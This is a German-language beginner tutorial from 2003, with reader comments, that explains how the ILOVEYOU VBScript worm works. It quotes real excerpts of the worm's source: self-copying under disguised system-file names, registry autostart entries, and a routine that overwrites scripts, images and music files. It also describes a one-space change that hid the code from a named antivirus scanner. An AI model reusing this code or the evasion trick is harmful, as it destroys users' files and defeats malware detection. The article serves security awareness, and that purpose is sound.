IT-Academy Logo
Sign Up Login Help
Home - Internet - Wie funktionieren Viren?



Wie funktionieren Viren?

Erklärt wird dies am Beispiel des ILOVEYOU-Virus, welches in der Vergangenheit großen Schaden angerichtet hat.


Autor: N Z (notzomedia)
Datum: 02-11-2003, 20:40:50
Referenzen: keine
Schwierigkeit: Anfänger
Ansichten: 12124x
Rating: 8.75 (4x bewertet)

Hinweis:

Für den hier dargestellte Inhalt ist nicht der Betreiber der Plattform, sondern der jeweilige Autor verantwortlich.
Falls Sie Missbrauch vermuten, bitten wir Sie, uns unter missbrauch@it-academy.cc zu kontaktieren.

[Druckansicht] [Als E-Mail senden] [Kommentar verfassen]



Einleitung

Fast jeder kennt ihn, den ILOVEYOU-Virus. Er verbreitete sich rasend schnell per E-Mail. Aber wie hat er funktioniert?

Der ILOVEYOU-Virus ist ein sehr primitiver Skript-Virus (Skript bedeutet, es handelt sich um eine Textdatei mit der Endung .vbs, "Visual Basic for Scripting", welche vom Windows Scripting Host interpretiert und ausgeführt wird). Diese .vbs-Datei hieß dann oftmals "LOVE-LETTER-FOR-YOU.TXT.vbs", die doppelte Endung ist ein kleiner Trick: Bei den Standardeinstellungen von Windows ist das "Ausblenden bekannter Dateiendungen" aktiviert, d.h. die Datei wird als "LOVE-LETTER-FOR-YOU.TXT" angezeigt (behält aber das Skript-Symbol). Vielleicht waren dadurch viele User verwirrt oder hielten es für eine einfache Text-Datei und öffneten diese per Doppelklick, was aber die Ausführung der Datei startete.

Nun wollen wir uns dem Inhalt der ILOVEYOU-Virus widmen, seine Funktionsweise wird anhand von Ausschnitten erklärt.
Am Anfang der Datei stehen ein paar Kommentare:


rem barok -loveletter(vbe)  i hate go to school 
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philipines

On Error Resume Next

bewirkt, dass bei einem Fehler einfach die nächste Anweisung ausgeführt wird.

Dann werden die Variablen deklariert:

dim fso,dirsystem,dirwin,regedit,file,vbscopy,c,ext,f1,ap
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll

und manchen von ihnen werden Werte zugewiesen

Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)

Jetzt wird der Pfad des Windows-Ordners (z.B. C:\Windows) und der des System-Ordners
(z.B. C:\Winnt\System32) ausgelesen und in Variablen gespeichert.

Set c = fso.GetFile(WScript.FullName)

c.Copy(dirsystem & "\MSKernel32.vbs")
c.Copy(dirwin & "\Win32DLL.vbs")
c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
Der Variable "c" wird die zurzeit ausgeführte Virus-Datei zugewiesen, anschließend kopiert sich der Virus zweimal in den System-Ordner und einmal in den Windows-Ordner, auch hier spielt die Standardeinstellung von Windows eine Rolle: der normale User wird "MSKernel32" und "Win32DLL" für System-Dateien halten.

Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run\MSKernel32",dirsystem & "\MSKernel32.vbs"
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunServices\Win32DLL",dirwin & "\Win32DLL.vbs"
Jetzt schreibt der Virus noch zwei Autostart-Einträge in die Registrierung, so dass er auch nach einem Neustart automatisch wieder läuft. Und was natürlich nicht fehlen darf, die Schadensroutine. Der Virus führt folgende Prüfung für jede Datei auf der Festplatte durch:

if (ext="vbs") or (ext="vbe") then
	Set ap=fso.OpenTextFile(f1.path,2,true)
	ap.Write vbscopy
	ap.Close
elseif (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") _
or (ext="jpg") or  (ext="jpeg") then
	Set ap=fso.OpenTextFile(f1.path,2,true)
	ap.Write vbscopy
	ap.Close
	renamefile(f1.path, f1.path & ".vbs")
elseif (ext="mp3") or (ext="mp2") then
	Set ap=fso.CreateTextFile(f1.path & ".vbs")
	ap.Write vbscopy
	ap.Close
	fso.GetFile(f1.path).attributes=fso.GetFile(f1.path).attributes+2
end if
"ext" steht für "extension" und heißt so viel wie Erweiterung, hier ist es die Dateiendung. Wird also eine Datei mit der Endung "vbs" oder "vbe" gefunden (andere Visual Basic for Scripting - Dateien), so wird sie einfach mit dem Virus überschrieben. Bei Dateien mit der Endung "js", "jse" (beides JavaScript), "css" (Cascading Style Sheets, HTML-Zusatzdateien), "wsh" (WindowsScriptingHost), "jpg" oder "jpeg" (beides Bilder, beliebtes Bildformat im Internet) werden diese auch überschrieben, anschließend wird aber noch ".vbs" angehängt, damit der Virus bei Doppelklick auch direkt ausgeführt wird. Dann wird noch nach MP3 und MP2-Dateien gesucht, hierbei wird aber nur eine neue Datei erstellt und die alte versteckt, d.h. der User startet den Virus, wenn er die Datei mit der (standardmäßig versteckten) Endung ".vbs" öffnet.

Mit dem Überschreiben der JPG- und JPEG-Dateien richtet der ILOVEYOU-Virus auch bei Servern einen großen Schaden an, alle Bilder, die z.B. auf den Internetseiten (HTML) dargestellt wurden sind verloren..

Am Ende liest der Virus noch das Adressbuch von Outlook aus und verschickt sich automatisch an alle E-Mailadressen, die er finden kann (dieser Abschnitt ist hier aus Sicherheitsgründen nicht dargestellt)!

So primitiv und doch so erfolgreich, dieser Virus. Wie kommt das?
Der Virus nutzt unsere Gefühle aus! Wer würde schon eine E-Mail löschen, an die auf den ersten Blick ein ungefährlicher Liebesbrief im Nur-Text-Format angehängt ist? Anscheinend waren viele Menschen neugierig und wollten lesen, was man ihnen geschickt hat.

Aktuelle Anti-Virenprogramme erkennen den ILOVEYOU-Virus zuverlässig, glauben wir jedenfalls! Probieren Sie es aus, kopieren Sie die oben veröffentlichten Teile in eine ".txt"-Datei (ungefährlich, da eine ".txt"-Datei nicht ausgeführt wird) und scannen Sie diese mit Ihrem Virenscanner, das Resultat können Sie vielleicht unter diesen Bericht als Kommentar schreiben!

Ich habe mit dem von CHIP empfohlenen Virenscanner von H+BEDV etwas erschreckendes herausgefunden: Den Virus im Original erkennt das Programm problemlos, fügt man aber ein Leerzeichen in die erste Deklarationszeile, so findet der Virenscanner nichts. Dieses Leerzeichen hat keine Bedeutung, von Windows wird exakt das gleiche ausgeführt. Dieser Virenscanner steht bei CHIP-Online unter den Top10, d.h. viele Menschen benutzen und vertrauen ihm. Es wäre kein Problem den Virus in eine ".vbs"-Datei zu kopieren und zu starten, er könnte von technischer Sicht wieder einen großen Schaden anrichten, aber vielleicht haben wir Menschen ja dazu gelernt.

Hinweis

Dieser Artikel soll keineswegs als Anleitung dienen um diesen Virus zu erstellen und zu verbreiten. Vielmehr soll es Ihnen bewusst machen, dass selbst harmlos aussehende Dateien, welche man per E-Mail erhält, eine potenzielle Gefahr sind. Lassen Sie sich daher keinesfalls täuschen und bleiben Sie stets Misstrauisch! Für die hier zur Verfügung gestellten Informationen wird keinerlei Haftung übernommen.


Obliv1on
Rookie
Beitrag vom:
19-04-2011, 07:38:15

Erschreckend

Die Überprüfung der Textdatei ergab weder mit noch ohne Leerzeilen kein Ergebnis. Das verwendete Virenprogramm ist Norton Internet Security 2011, komplett geupdatet, etc.

Ich finde es erschreckend, dass ein Virenprogramm, welches 40€ kostet nicht einmal solch ein einfaches Script erkennt.

-----------------------------------------------------


GeKo
Rookie
Beitrag vom:
31-10-2008, 11:03:16

I Love You Virus

Resultat Positiv:

Enthählt erkennungsmuster des VBS-Scriptvirus VBS/Yeno

Der wahnsinn...!

-----------------------------------------------------


Gamma
Rookie
Beitrag vom:
11-12-2005, 11:45:09

negativ

also ich hab das mit dem virenscanner ausprobiert und es war nichts kömisch oder?
liegt das vieleicht daran das schon eine leerzeile oder etwas ähnliches den virus für den virenscanner unkenntlich macht?

und nochwas so ziemlich die selbe viren anleitung habe ic schonmal in einem anderen forum zu sehen bekommen

-----------------------------------------------------
die starken leben von den schwachen


[back to top]



Userdaten
User nicht eingeloggt

Gesamtranking
Werbung
Datenbankstand
Autoren:04510
Artikel:00815
Glossar:04116
News:13565
Userbeiträge:16552
Queueeinträge:06247
News Umfrage
Ihre Anforderungen an ein Online-Zeiterfassungs-Produkt?
Mobile Nutzung möglich (Ipone, Android)
Externe API Schnittstelle/Plugins dritter
Zeiterfassung meiner Mitarbeiter
Exportieren in CSV/XLS
Siehe Kommentar



[Results] | [Archiv] Votes: 1157
Comments: 0